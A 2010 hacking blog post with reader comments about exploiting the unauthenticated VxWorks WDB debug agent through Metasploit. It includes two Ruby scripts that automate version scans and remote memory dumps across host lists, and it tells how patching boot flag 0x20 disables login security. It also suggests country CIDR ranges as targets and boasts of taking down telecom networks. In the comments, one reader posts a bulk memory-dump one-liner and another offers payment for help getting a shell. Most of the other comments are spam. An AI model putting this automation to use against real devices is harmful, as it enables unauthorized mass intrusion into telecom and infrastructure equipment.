Friday, August 6, 2010

Metasploit VxWorks WDB Agent Attack Automation

In CHINA pwnage is still called pwnage.

CERT published multiple advisories this week for the VxWorks operating system. The information can be found here VU#362332 and VU#840249. If you want more information on the Metasploit exploitation process visit this awesomeness posted on the Metasploit blog.

A few things you should know about the exploit.

The VxWorks debug service runs on port 17185 (UDP).

An attacker can execute the following attacks without any authentication required while maintaining a certain level of stealthiness.

  1. Remote memory dump
  2. Remote memory patch
  3. Remote calls to functions
  4. Remote task management
 
Go big or go home...
 
In June, I started testing some of the VxWorks WDB Metasploit modules HD put together. My initial goal was to look at other possible vectors of exploitation, i.e., the boot flag manipulation. We discussed this at BSidesLasVegas and Defcon. The next goal was to write my own exploit for a specific product.

The twenty-flag (0x20) as I like to call it disables login security for VxWorks devices. The amazing thing about changing flags is the fact that it survives a soft reset. I did have some trouble on a few devices. The offset for the flags can vary depending on the hardware version of the device.

In addition, if you decide to write a VxWorks wdbrpc exploit make sure you add a function to check the version by reading from memory first to identify the target so you can patch at the correct offset. If not your module might be prone to errors. See the dlink_i2eye_autoanswer module for a good example on adding multiple targets.

The following image shows the delta between two Huawei IAD (Integrated Access Device) memory dumps. The first displays the boot flag before the change and the other after the exploit.

Huawei IAD2 boot flags.
  • 0x02 -load local system symbols 
  • 0x04 -don't autoboot
  • 0x08 -quick autoboot(no countdown) 
  • 0x20 -disable login security 
  • 0x40 -use bootpto get boot parameters
  • 0x80 -use tftpto get boot image 
  • 0x100 -use proxy arp





Now, if we add one line of ruby code to the end of our exploit module we can issue a soft reset to the vulnerable device after a remote patch with new unlocked features enabled at next boot! #FTW

While a soft reset isn't always necessary and can cause unwanted attention especially during a penetration test or a live exercise, it is unfortunately necessary when manipulating boot flags so remember to use with care.

We can also locate other devices on the LAN, change tftp parameters, backdoor a device and obviously cause unwanted interference.

Depending on the target, you may be able to unlock, disable or enable certain functionality, on most devices running the VxWorks WDB agent.

What does the data look like?

A few examples of the exploit might allow you to write your name on Mars or even shut down 60% of two of the largest telecommunication companies in CHINA, specifically CHINA Telecom and CHINA UNICOM.

I ran a smoke test for approximately 24 hours using the Metasploit framework in a cloud computing environment. Just to give you an example, a single vulnerable device might very well include a telecommunication switch providing access to a backbone for an entire province within a country or even several interconnected core routes. In other words, don't let the number of vulnerable devices dictate the importance of the results. I also performed a simple whois query on the results, I was then able to parse the location data and map out various flash-points.






How can I automate the scanning process in Metasploit?

It's actually very simple. Feel free to modify the script to your own liking. Its more of a proof of concept to show others how simple it is to automate Metasploit.

Taking over the internetz in 3 easy steps.

1. Install Metasploit

2. Add your targets to a host list.

3. run the script.


Moreover, the script is also useful if you want to automate the memory dump process after all of your scans are complete. The dump process can take a very long time which is exactly why automation is so important.

Just change the output for vxworks.rc to the memory dump module and assign the dump name ( LPATH ) to include the #{line} variable ( this would be the target IP in hosts.log ) the result is the target appended to the vxworks_memory.dmp 

No worries... I've done it for you! :)




VxWorks WDB Agent AutoScan


----snip----
#!/usr/bin/ruby




# Inserts a new RHOSTS entry into the rc file.
def SwapRHOSTS(file, regex_to_find, text_to_put_in_place)
    text = File.read file
    File.open(file,'w+'){|f| f << text.gsub(regex_to_find, text_to_put_in_place)}
end


# Removes last IP block from list.
def RemoveLine()
   
    log = "hosts.log"
    text = ''
    File.open(log,"r"){|f|f.gets;text=f.read}
    File.open(log,"w+"){|f| f.write(text)}


end


    f = File.open('hosts.log')
    f.each do |line|
    

    puts "Target: #{line}"
    system("touch vxworks.rc")
    m = File.open('vxworks.rc', 'w') do |m|
    m.puts "db_driver sqlite3"
    m.puts "db_connect scandb"
    m.puts "use scanner/vxworks/wdbrpc_version"
    m.puts "set RHOSTS "
    m.puts "run"
    m.puts "exit"


end

    SwapRHOSTS('vxworks.rc', /set RHOSTS/, "set RHOSTS #{line}".chomp)
       
    system("msfconsole -r vxworks.rc")
   
    RemoveLine()

end

----snip----


VxWorks WDB Agent AutoDump



----snip----
#!/usr/bin/ruby
# Inserts a new RHOSTS entry into the rc file.
def SwapRHOSTS(file, regex_to_find, text_to_put_in_place)
    text = File.read file
    File.open(file,'w+'){|f| f << text.gsub(regex_to_find, text_to_put_in_place)}
end

# Removes last IP block from list.
def RemoveLine()
   
    log = "hosts.log"
    text = ''
    File.open(log,"r"){|f|f.gets;text=f.read}
    File.open(log,"w+"){|f| f.write(text)}


end


    f = File.open('hosts.log')
    f.each do |line|
    

    puts "Target: #{line}"
    system("touch vxworks.rc")
    m = File.open('vxworks.rc', 'w') do |m|
    m.puts "db_driver sqlite3"
    m.puts "db_connect scandb"
    m.puts "use admin/vxworks/wdbrpc_memory_dump"

    m.puts "set LPATH /tmp/vxworks_memory_"+"#{line}".chomp
    m.puts "set RHOST "
    m.puts "run"
    m.puts "exit"


end

    SwapRHOSTS('vxworks.rc', /set RHOST/, "set RHOST #{line}".chomp)
       
    system("msfconsole -r vxworks.rc")
   
    RemoveLine()

end

----snip----

Here is a decent starting point for some passive reconnaissance.

Korea CIDR


China CIDR


India CIDR


Russia CIDR


Turkey CIDR


Viet Nam CIDR


Ukraine CIDR


Brazil CIDR


Venezuela CIDR


Pakistan CIDR



I'm not a Ruby developer. I just picked it up a few months ago. The automation is quick and dirty but it should get the job done.

In terms of new exploits for different types of vendor specific products Wind River has opened up Pandora's box, not the researchers.

It was a true honor to be a part of such an exciting research project.

-D1N

17 comments:

  1. Awesome work. I was super lazy in my auto-dumping efforts. After copying the results from the scan into a file from msfconsole and massaging it into just a list of IPs via grep/cut/awk, I used a bash one-liner with msfcli to dump memory from each device into a file based on its IP.

    for i in `cat hosts`; do ./msfcli auxiliary/admin/vxworks/wdbrpc_memory_dump RHOST=$i LPATH=/tmp/vxworks/$i E ; done

    Yeah, I know....lazy, but it worked like a charm!

    ReplyDelete
  2. Hey there. I am working on the memory dump phase as well. I am able to get the memory size and the bootline of the vxworks system, but I am not able to get the memory dump done. Any change I could offer me some of your time to help me with my research ?

    ReplyDelete
  3. Hi Guys

    That bug really important for me i used it with metasploit and i have got vxworks.dmp how can i open it and what will be happen after i opened that file i need execute my commands or i want to get shell in the server who helps to me with this i will also give 50$

    Please i need it in my test
    Waiting your replies

    Thanks
    CyberLord

    ReplyDelete
  4. Very efficiently written information. It will be valuable to everyone who uses it, including myself. Thanks a lot. Stainless steel fasteners stainless steel fasteners, bolts, nuts, screws, decking screws, washers etc. All products are Stainless steel.

    ReplyDelete
  5. This is very good information a really nice blog and I wait for next update your blog. Energy efficiency heater from high efficiency toilets, to tankless water heaters and leak proofing with pipe retrofits,

    ReplyDelete
  6. That bug truly critical for me i utilized it with metasploit and i have vxworks.dmp in what manner would i be able to open it and what will be happen after i opened that record i require execute my charges or i need to get shell in the server who serves to me with this

    Pay for an essay

    ReplyDelete
  7. Our painting services include interior & exterior house painting, Commercial painting​, pressure washing, as well as painting before moving And The only national commercial painter under one owner that gives you consistent high quality nationwide, single point of contact and unparalleled industry.This blog is very useful and helpful.

    ReplyDelete
  8. This article is pretty interesting since there is so many useful information inside. We need more similar info on a daily basis. Hope you'll regularly update this web in the future. Thank you. Bieszczady domki Drewniane domki o wysokim standardzie w Bieszczadach. Własne kąpielisko, boisko, plac zabaw, Domki bieszczady,Bieszczady domki ,Domki w bieszczadach ,Bieszczady noclegi ,Noclegi bieszczady.

    ReplyDelete
  9. This article is really fascinating subsequent to there's such a variety of valuable information inside. Express gratitude toward you.We require more data like this regularly. Trust you'll routinely overhaul this web in the future.We require more information like this once a day. Trust you'll routinely overhaul this web in the future.This article is really intriguing following there's such a large number of helpful information inside. Much obliged to you.

    Grommet Curtains

    ReplyDelete
  10. I loved the way you discuss the topic great work thanks for the share Your informative post.
    Mechanical Engineering Assignment Help

    ReplyDelete
  11. Pleasant short article, thanks to the details. It is very comprehensive data www.iessaywriter.com

    ReplyDelete
  12. If you're utterly passionate about life,
    then I certainly know you are looking
    for the most zany, kooky N savvy elixers
    of eternal Seventh-Heaven, right?
    Tell me if Im wrong, buddy.
    Follow us to the Great Beyond...

    Ok. Here's the deal:

    Yes, earthling, Im an NDE
    (thus, my ethereal nomenclature) -
    so I actually know God exists:
    He rewards those who HONOR n RESPECT
    Him and strive to follow His Laws;
    for those who wanna know what
    Seventh-Heaven holds for your
    indelible, magnificent soul whom
    God has so carefully crafted -
    and if you're not too concerned
    with WWIII and N. Korea,
    you better follow us:

    Find-out what RCIA means and join.
    trustNjesus.
    ALWAYS.
    God bless your indelible soul.

    ReplyDelete
  13. If you're utterly passionate about life,
    then I certainly know you are looking
    for the most zany, kooky N savvy elixers
    of eternal Seventh-Heaven, right?
    Tell me if Im wrong, buddy.
    Follow us to the Great Beyond...

    Ok. Here's the deal:

    Yes, earthling, Im an NDE
    (thus, my ethereal nomenclature) -
    so I actually know God exists:
    He rewards those who HONOR n RESPECT
    Him and strive to follow His Laws;
    for those who wanna know what
    Seventh-Heaven holds for your
    indelible, magnificent soul whom
    God has so carefully crafted -
    and if you're not too concerned
    with WWIII and N. Korea,
    you better follow us:

    Find-out what RCIA means and join.
    trustNjesus.
    ALWAYS.
    God bless your indelible soul.

    ReplyDelete